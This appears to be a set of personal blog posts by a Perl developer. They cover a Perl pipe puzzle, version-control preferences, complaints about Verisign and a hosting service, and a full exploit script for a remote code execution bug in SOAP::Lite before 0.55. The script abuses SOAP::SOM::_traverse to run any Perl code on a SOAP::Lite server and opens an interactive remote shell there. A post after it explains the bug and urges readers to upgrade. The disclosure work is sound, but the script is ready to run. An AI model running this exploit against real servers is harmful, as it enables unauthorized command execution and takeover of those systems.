use Perl

What is the difference between these two lines (on Linux with Perl 5.8.x or 5.6.x). More precisely why does only first open die?

open(FH, '/doesnt/exist  2>&1 |') or die "Cannot pipe: $!";

open(FH, '/doesnt/exist\\  2>&1 |') or die "Cannot pipe: $!";

Hint if you have no idea: try to remove 2>&1 from command line.

Update: I've got email from Tina Mueller and she told me that she have added fortune data file. Cool!

As for me I'm trying to choose between Aegis and arch. I'm looking with very big suspect on subversion - my guts feeling is that subversion is too overengineered. Instead of solving real VC problems we see Apache intergration, WebDAV, binary db backend. At the end from the point of view of end user (i.e. me) it doesn't offer much more then old CVS.

P.S. And, yeah, BitKeeper rocks. But it is too expensive for us.

Just noticed that popular Russian forum on extreme programming has now a warning on its first page which literaly translates as If you will ask questions about Windows XP we will find and kill you! :)

#!/usr/bin/perl -w

# Copyright (c) 2002 by Ilya Martynov. All rights reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the same terms as Perl itself.

# This program exploits security bug in SOAP::Lite which allows any
# SOAP client call any Perl subroutine as class/object method on side
# of SOAP::Lite based SOAP server.
#
# This vulnerability have been found by stealth <stealth@segfault.net>
# and described in Phrack article 'RPC without borders':
#
#     http://www.phrack.com/show.php?p=58&a=9
#
# This program shows how to
#
# 1) evaluate any Perl code inside SOAP::Lite based server
#
# 2) access remote pseudo shell
#
# using this security bug.

use strict;

use SOAP::Lite;
use Term::ReadLine;

my($uri, $proxy) = @ARGV;
unless(defined $proxy) {
    die "Usage: $0 URI PROXY\n";
}

my $soap = connect_soap($uri, $proxy);
shell($soap);

# returns soap object
sub connect_soap {
    my $uri = shift;
    my $proxy = shift;

    my $soap = SOAP::Lite
    -> uri($uri)
    -> proxy($proxy);

    return $soap;
}

# evals any Perl code on side of SOAP::Lite based server
sub remote_eval {
    my $soap = shift;
    my $expr = shift;

    # escape Perl expression
    $expr = escape_single_quoted($expr);

    # code to run on side of SOAP::Lite server
    my $code = <<CODE;
{
    # make sure exploit works in tainted mode
    local \%ENV = \%ENV;
    (\$ENV{PATH}) = \$ENV{PATH} =~ /(.*)/;
    delete \@ENV{qw(IFS CDPATH ENV BASH_ENV)};

    # evaluate Perl code
    my \$ret = eval '$expr';
    # catch errors
    if(\$\@) { \$ret = \$\@ }
    # put result into array which will be returned to SOAP client
    \$pointer->[0] = \$ret;
}
1
CODE

    my @params = ([], $code, '[1]');

    my $som = $soap->call('X:SOAP::SOM::_traverse' => @params);

    return $som->result->[0];
}

# simple pseudo shell which allows to execute commands on side of
# SOAP::Lite based server
sub shell {
    my $soap = shift;

    my $term = new Term::ReadLine 'SOAP::Lite remote shell';
    my $OUT = $term->OUT || \*STDOUT;

    while (defined (my $cmd = $term->readline('> ')) ) {
        chomp $cmd;
        my $cmd = escape_single_quoted($cmd);
        print $OUT remote_eval($soap, "qx'$cmd'");
        $term->addhistory($cmd) if $cmd =~ /\S/;
    }
}

# escapes string which is going to be used as single quoted string
sub escape_single_quoted {
    my $string = shift;

    $string =~ s/(['\\])/\\$1/g;

    return $string;
}

How does it work? Before 0.55 it was possible to call any subroutine in any Perl packages inside of SOAP::Lite based server (at least when autodispatch is turned on). Package X:SOAP::SOM used to contain (and actually still contains subroutine _traverse):

# source code of _traverse from 0.52
sub _traverse {
  my $self = shift;
  my($pointer, $itself, $path, @path) = @_;

  if ($path && substr($path, 0, 1) eq '{') {
    $path = join '/', $path, shift @path while @path && $path !~ /}/;
  }

  my($op, $num) = $path =~ /^\[(<=|<|>=|>|=|!=?)?(\d+)\]$/ if defined $path;

  return $pointer unless defined $path;

  $op = '==' unless $op; $op .= '=' if $op eq '=' || $op eq '!';
  my $numok = defined $num && eval "$itself $op $num";
  my $nameok = (o_lname($pointer) || '') =~ /(?:^|\})$path$/ if defined $path; # name can be with namespace

  my $anynode = $path eq '';
  unless ($anynode) {
    if (@path) {
      return if defined $num && !$numok || !defined $num && !$nameok;
    } else {
      return $pointer if defined $num && $numok || !defined $num && $nameok;
      return;
    }
  }

  my @walk;
  push @walk, $self->_traverse_tree([$pointer], @path) if $anynode;
  push @walk, $self->_traverse_tree(o_child($pointer), $anynode ? ($path, @path) : @path);
  return @walk;
}

As you can see one of code paths contains a call to eval. And since we can call this subroutine directly we can bypass whatever Perl code we want to this eval. The only thing required from the exploit to work is to supply correct arguments for this subroutine to enable the code path with eval.

I hope all of you upgraded to 0.55 - after all this release which fixes the security hole exploited by this exploit was released one year ago.

Update: Fix s/made present/gave present/. Thanks to jdavidboyd and phillup for free English lesson :)

If you use or develop any software affected by Verisign "innovations" you may find this page interesting.

In other news Verisign was sued over new VeriSign's "services". I hope Verisign will burn in hell.

Update: Those Verisign monkeys cannot even write simple search page without XSS bugs. See here (warning - explicit content). I've made a screenshot in case they fix it. Thanks to Pan T. Hose from slashdot for spoting it.

• Mailling list archives are being broken too often
• Mailling list archives do not show attachments
• Web interface to CVS and anonymous access to CVS has up to 24 hours lag

Yes, it is a free service and if I don't like it I can pack my things and go somewhere else. Well, probably I will do exactly this.